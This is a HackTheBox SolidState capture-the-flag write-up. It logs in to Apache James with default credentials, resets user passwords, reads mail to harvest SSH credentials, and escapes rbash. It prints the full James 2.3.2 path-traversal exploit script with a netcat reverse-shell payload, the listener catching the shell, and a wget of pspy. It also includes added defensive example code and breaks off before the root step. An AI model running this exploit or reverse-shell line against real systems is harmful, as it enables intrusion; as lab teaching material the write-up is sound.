HTB SolidState writeup (attack chain analysis: why does the mail service become the "perfect entry point" for initial access?)

HTB SolidState writeup

Experts, please skip this!

SolidState attack key points:

★ James Mail Server information gathering

★ Privilege escalation via a cron job

Information gathering

nmap

└─$ nmap -p- -sCV --min-rate 1000 10.10.10.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 20:59 CST
Nmap scan report for 10.10.10.51
Host is up (0.21s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.16.14 [10.10.16.14])
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.74 seconds

The target exposes SSH on port 22, the JAMES services on ports 25 (SMTP), 110 (POP3), 119 (NNTP) and 4555 (James admin), and HTTP on port 80; the operating system is Debian.

http

gobuster

Directory and file enumeration
└─$ gobuster dir -u http://10.10.10.51/ -t 100 -o gobuster.log --no-error -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.51/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 311] [--> http://10.10.10.51/images/]
/.html                (Status: 403) [Size: 291]
/index.html           (Status: 200) [Size: 7776]
/about.html           (Status: 200) [Size: 7183]
/services.html        (Status: 200) [Size: 8404]
/assets               (Status: 301) [Size: 311] [--> http://10.10.10.51/assets/]
/README.txt           (Status: 200) [Size: 963]
/LICENSE.txt          (Status: 200) [Size: 17128]
/.html                (Status: 403) [Size: 291]
/server-status        (Status: 403) [Size: 299]
Progress: 661677 / 661680 (100.00%)
===============================================================
Finished
===============================================================

Nothing useful to exploit here.

James Mail Server - TCP 25/110/119/4555

James Mail Server is listening on four ports with different functions. Simple Mail Transfer Protocol (SMTP) on TCP 25, Post Office Protocol (POP3) on TCP 110, and Network News Transfer Protocol (NNTP) on TCP 119 are all services that this box is offering. I could look at potentially brute forcing valid user names or sending phishing emails, but first I want to look at port 4555.
TCP port 4555 is interesting because it is the James administration port. Even without an exploit, if I can access this service, I can likely get into things that might be useful. That said, I'll first check searchsploit. nmap identified this as version 2.3.2, and there's a match on an RCE exploit:

Shell as mindy

The James server's default credentials are root/root.

James admin usage example:

telnet localhost 4555
JAMES Remote Administration Tool 2.3.1
Login id:root
Password:root
Welcome root.
HELP...
quit
Bye

Logging in to the JAMES Remote Manager with the default credentials reveals five users: james, thomas, john, mindy and mailadmin.
└─$ telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Reset the passwords of these five users, log in to their mailboxes, and check whether they hold anything valuable.

Resetting user passwords
setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy reset
setpassword mailadmin mailadmin
Password for mailadmin reset

POP syntax

POP commands:
  USER uid           Log in as "uid"
  PASS password      Substitute "password" for your actual password
  STAT               List number of messages, total mailbox size
  LIST               List messages and sizes
  RETR n             Show message n
  DELE n             Mark message n for deletion
  RSET               Undo any changes
  QUIT               Logout (expunges messages if no RSET)
  TOP msg n          Show first n lines of message number msg
  CAPA               Get capabilities

Example:

root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean

list

+OK 2 1807
1 786
2 1021

retr 1

+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,

Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
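The POP3 command table and the telnet sessions above are the whole protocol this box needs: a status line beginning with +OK or -ERR after every command, and multi-line replies (LIST, RETR) terminated by a lone "." with any body line that starts with "." byte-stuffed as "..". The following is an added example, not code from the writeup or from Apache James: a small POP3 client that checks each status line and un-stuffs multi-line replies, plus an in-process fake server with a constructed mailbox so the exchange runs offline. The user "mindy", the password "example-password" and the message texts are constructed for the example.

```python
import socket
import threading

# Constructed sample data for the in-process fake server (not from the target box).
SAMPLE_USERS = {"mindy": "example-password"}
SAMPLE_MAILBOX = {
    1: "From: mailadmin@localhost\r\nSubject: Welcome\r\n\r\nDear Mindy,\r\n.NET training starts Monday.\r\n",
    2: "From: mailadmin@localhost\r\nSubject: Your Access\r\n\r\nusername: mindy\r\npass: <redacted>\r\n",
}


def _serve_one(conn, users, mailbox):
    """Tiny POP3 server covering the RFC 1939 subset listed in the command table."""
    rfile = conn.makefile("rb")
    send = lambda line: conn.sendall((line + "\r\n").encode())
    send("+OK example POP3 server ready")
    user, authed = None, False
    while True:
        raw = rfile.readline()
        if not raw:
            break
        parts = raw.decode(errors="replace").rstrip("\r\n").split(" ", 1)
        cmd, arg = parts[0].upper(), (parts[1] if len(parts) > 1 else "")
        if cmd == "USER":
            user = arg
            send("+OK")
        elif cmd == "PASS":
            authed = users.get(user) == arg
            send("+OK Welcome " + user if authed else "-ERR Authentication failed")
        elif not authed:
            send("-ERR Not authenticated")
        elif cmd == "STAT":
            send("+OK %d %d" % (len(mailbox), sum(len(m) for m in mailbox.values())))
        elif cmd == "LIST":
            send("+OK %d messages" % len(mailbox))
            for n, m in sorted(mailbox.items()):
                send("%d %d" % (n, len(m)))
            send(".")
        elif cmd == "RETR" and arg.isdigit() and int(arg) in mailbox:
            send("+OK Message follows")
            for line in mailbox[int(arg)].splitlines():
                # byte-stuffing: a body line that starts with '.' is sent as '..'
                send("." + line if line.startswith(".") else line)
            send(".")
        elif cmd == "QUIT":
            send("+OK signing off")
            break
        else:
            send("-ERR unknown command or message")
    conn.close()


def start_fake_server(users=SAMPLE_USERS, mailbox=SAMPLE_MAILBOX):
    """Bind a loopback port, serve one client in a daemon thread, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        _serve_one(conn, users, mailbox)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


class Pop3Client:
    """POP3 client that checks every status line and un-stuffs multi-line replies."""

    def __init__(self, host, port):
        self.sock = socket.create_connection((host, port), timeout=5)
        self.rfile = self.sock.makefile("rb")
        self._readline()  # server greeting

    def _readline(self):
        return self.rfile.readline().decode(errors="replace").rstrip("\r\n")

    def _cmd(self, line):
        self.sock.sendall((line + "\r\n").encode())
        reply = self._readline()
        if not reply.startswith("+OK"):  # -ERR or a dropped connection
            raise RuntimeError("%s failed: %s" % (line.split(" ")[0], reply))
        return reply

    def _multiline(self):
        lines = []
        while True:
            line = self._readline()
            if line == ".":  # terminator; a stuffed line is at least ".."
                return lines
            lines.append(line[1:] if line.startswith("..") else line)

    def login(self, user, password):
        self._cmd("USER " + user)
        self._cmd("PASS " + password)

    def list(self):
        self._cmd("LIST")
        return [(int(n), int(size)) for n, size in (l.split() for l in self._multiline())]

    def retr(self, n):
        self._cmd("RETR %d" % n)
        return "\n".join(self._multiline())

    def quit(self):
        self._cmd("QUIT")
        self.sock.close()


def fetch_all(host, port, user, password):
    """Log in, LIST, RETR every message, QUIT: the loop the writeup does by hand per mailbox."""
    c = Pop3Client(host, port)
    c.login(user, password)
    msgs = {n: c.retr(n) for n, _ in c.list()}
    c.quit()
    return msgs
```

Run `fetch_all("127.0.0.1", start_fake_server(), "mindy", "example-password")` to see the dictionary of message bodies; the first message contains a line starting with "." so the dot-stuffing path is exercised, and a wrong password surfaces as a RuntimeError carrying the server's -ERR line instead of being silently ignored.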

Collecting user information

James

└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER james
+OK
pass james
+OK Welcome james
LIST
+OK 0 0
.
Connection closed by foreign host.

Thomas

└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user thomas
+OK
pass thomas
+OK Welcome thomas
list
+OK 0 0
.
Connection closed by foreign host.

John

└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass john
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.

quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

mindy

└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass mindy
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.
Connection closed by foreign host.

Credentials: mindy/P@55W0rd1!2@

mailadmin

└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mailadmin
+OK
pass mailadmin
+OK Welcome mailadmin
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

shell

└─$ ssh mindy@10.10.10.51
The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
ED25519 key fingerprint is SHA256:rC5LxqIPhybBFae7BXE/MWyG4ylXjaZJn6z2/1+GmJg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.51' (ED25519) to the list of known hosts.
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ id
-rbash: id: command not found

Breaking out of rbash

└─$ ssh mindy@10.10.10.51 -t bash
mindy@10.10.10.51's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

Intended Path

James 2.3.2 exploit

Principle: when a user is created in James, the server creates a directory named after the user and stores the mail received for that user in it. The server does not validate the username, so creating a user with a name like "../../../../../../test" creates the directory /test at the filesystem root and stores the mail received for that user there.
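The root cause described above is an unvalidated username joined onto a repository path. As an added example (not code from the writeup or from Apache James, which is Java; the repository root "/var/mail/james" is an assumed placeholder), the following shows the unchecked path construction next to a hardened form that allow-lists the name and then confirms the resolved path still lies under the root, plus a detection helper that flags recipient addresses whose local part would fail the same allow-list, suitable for running over SMTP logs or Delivered-To headers such as the one seen later in this writeup.

```python
import posixpath
import re

# Assumed repository root (placeholder, not James's real mailbox location).
REPO_ROOT = "/var/mail/james"
# Allow-list for a mailbox name: starts alphanumeric, then letters, digits, '.', '_', '-'.
USERNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


class InvalidUsername(ValueError):
    pass


def mailbox_dir_unchecked(root, username):
    """Behaviour the writeup describes: the name is joined onto the root with no
    validation, so '..' segments walk out of the repository (normpath shows where)."""
    return posixpath.normpath(posixpath.join(root, username))


def validate_username(username):
    """Reject any name outside the allow-list; this alone stops '/' and '..'."""
    if not USERNAME_RE.match(username):
        raise InvalidUsername("disallowed username: %r" % username)
    return username


def mailbox_dir_checked(root, username):
    """Hardened form: allow-list the name, then confirm the resolved path stays under root."""
    validate_username(username)
    candidate = posixpath.normpath(posixpath.join(root, username))
    if posixpath.commonpath([root, candidate]) != root:  # defence in depth
        raise InvalidUsername("resolved path escapes repository root: %s" % candidate)
    return candidate


def flag_suspicious_recipients(addresses):
    """Detection side: return recipient addresses whose local part fails the allow-list."""
    hits = []
    for addr in addresses:
        local = addr.rsplit("@", 1)[0]
        if not USERNAME_RE.match(local):
            hits.append(addr)
    return hits


# Constructed sample recipients: one normal user and one traversal attempt.
SAMPLE_RECIPIENTS = [
    "john@localhost",
    "../../../../../../../../etc/bash_completion.d@localhost",
]
```

`mailbox_dir_unchecked(REPO_ROOT, "../../../../../../../../etc/bash_completion.d")` resolves to /etc/bash_completion.d, which is exactly the directory the exploit later targets; `mailbox_dir_checked` refuses the same name before any path is built, and `flag_suspicious_recipients(SAMPLE_RECIPIENTS)` returns only the traversal address.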

/etc/bash_completion.d

/etc/bash_completion.d is the system directory on Linux that holds Bash command-completion scripts, which define the auto-completion behaviour of commands. On SSH login these scripts are loaded (via /etc/bash_completion), and their functions run when completion is triggered.
By writing into /etc/bash_completion.d, the planted reverse shell is triggered whenever any user logs in over SSH.

└─$ cat 35513.py
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
payload = '/bin/nc -c bash 10.10.16.14 443' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]

def recv(s):
        s.recv(1024)
        time.sleep(0.2)

try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()

    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,25))
    s.send("ehlo team@team.pl\r\n")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@team.pl>\r\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: team@team.pl\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."

Running the exploit

└─$ python2 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

└─$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 27 02:46:34 2025 from 10.10.16.14
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
         errorMessagetLjava/lang/String: No such file or directory
-rbash: L
         lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <5970655.0.1761528882207.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.16.14 ([10.10.16.14])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 505
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Sun, 26 Oct 2025 21:34:02 -0400 (EDT)
Date: Sun, 26 Oct 2025 21:34:02 -0400 (EDT)
From: team@team.pl

: No such file or directory
-rbash: connect: Connection refused
-rbash: /dev/tcp/10.10.16.14/9000: Connection refused
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
         errorMessagetLjava/lang/String: No such file or directory
-rbash: L
         lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <11430700.1.1761546242958.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.16.14 ([10.10.16.14])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 496
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Mon, 27 Oct 2025 02:23:22 -0400 (EDT)
Date: Mon, 27 Oct 2025 02:23:22 -0400 (EDT)
From: team@team.pl

: No such file or directory
(UNKNOWN) [10.10.16.14] 9002 (?) : Connection refused
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
         errorMessagetLjava/lang/String: No such file or directory
-rbash: L
         lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <25509615.2.1761546611836.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.16.14 ([10.10.16.14])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 385
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Mon, 27 Oct 2025 02:29:31 -0400 (EDT)
Date: Mon, 27 Oct 2025 02:29:31 -0400 (EDT)
From: team@team.pl

: No such file or directory
(UNKNOWN) [10.10.16.14] 9002 (?) : Connection refused
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
         errorMessagetLjava/lang/String: No such file or directory
-rbash: L
         lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <25588697.3.1761546839503.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.16.14 ([10.10.16.14])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 747
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Mon, 27 Oct 2025 02:33:19 -0400 (EDT)
Date: Mon, 27 Oct 2025 02:33:19 -0400 (EDT)
From: team@team.pl

: No such file or directory
(UNKNOWN) [10.10.16.14] 9002 (?) : Connection refused
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
         errorMessagetLjava/lang/String: No such file or directory
-rbash: L
         lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <8441270.4.1761547157536.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.16.14 ([10.10.16.14])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 658
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Mon, 27 Oct 2025 02:38:37 -0400 (EDT)
Date: Mon, 27 Oct 2025 02:38:37 -0400 (EDT)
From: team@team.pl

: No such file or directory

└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.14] from (UNKNOWN) [10.10.10.51] 60888
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

Shell as root

In /opt there is a script tmp.py that is readable, writable and executable by everyone (others have rwx).

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd /opt/
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 May 27  2022 ..
drwxr-xr-x 11 root root 4096 Apr 26  2021 james-2.3.2
-rwxrwxrwx  1 root root  122 Oct 26 21:49 tmp.py

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt/james-2.3.2/conf$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux

Upload pspy32 to the target and run it to watch the processes on the system; it shows tmp.py being run by root every 3 minutes.

pspy32

pspy32 is a powerful, lightweight process-monitoring tool. It works without privileges by reading the /proc filesystem, which makes it well suited to information gathering and privilege-escalation hunting during a penetration test. Its main uses are finding exploitable cron jobs, insecure process execution and filesystem events. By analysing pspy's output, an attacker can locate configuration weaknesses (such as writable scripts or insecure mount points) and turn them into privilege escalation or persistence. On the defensive side, administrators should audit cron jobs regularly, check script permissions and restrict access to /proc to reduce what pspy32 can discover.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ wget http://10.10.16.14/pspy32
--2025-10-26 21:31:43--  http://10.10.16.14/pspy32
Connecting to 10.10.16.14:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2940928 (2.8M) [application/octet-stream]
Saving to: 'pspy32'

pspy32                          100%[====================================================>]   2.80M   538KB/s    in 8.1s

2025-10-26 21:31:51 (353 KB/s) - 'pspy32' saved [2940928/2940928]

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ ./pspy32
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
